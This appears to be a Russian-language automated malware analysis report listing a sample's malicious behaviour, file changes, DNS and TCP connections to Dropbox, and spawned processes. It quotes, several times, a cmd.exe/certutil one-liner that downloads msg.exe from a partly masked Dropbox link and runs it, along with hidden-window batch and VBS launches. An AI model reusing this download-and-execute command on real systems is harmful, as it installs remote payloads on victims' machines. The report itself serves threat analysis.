Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe&if exist msg.exe start msg.exe
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\msg.exe
- %TEMP%\9961.tmp\9972.tmp\9973.bat
- <Текущая директория>\msg.vbs
Удаляет следующие файлы
- %TEMP%\9961.tmp\9972.tmp\9973.bat
Сетевая активность
TCP
- 'dr##box.com':443
- 'uc#############ece9eb8f96438.dl.dropboxusercontent.com':443
UDP
- DNS ASK dr##box.com
- DNS ASK uc#############ece9eb8f96438.dl.dropboxusercontent.com
- DNS ASK st####.rapidssl.com
Другое
Создает и запускает на исполнение
- '<Текущая директория>\msg.exe'
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\msg.vbs"
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe&if exist msg.exe start msg.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\9961.tmp\9972.tmp\9973.bat <Текущая директория>\msg.exe"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\9961.tmp\9972.tmp\9973.bat <Текущая директория>\msg.exe"
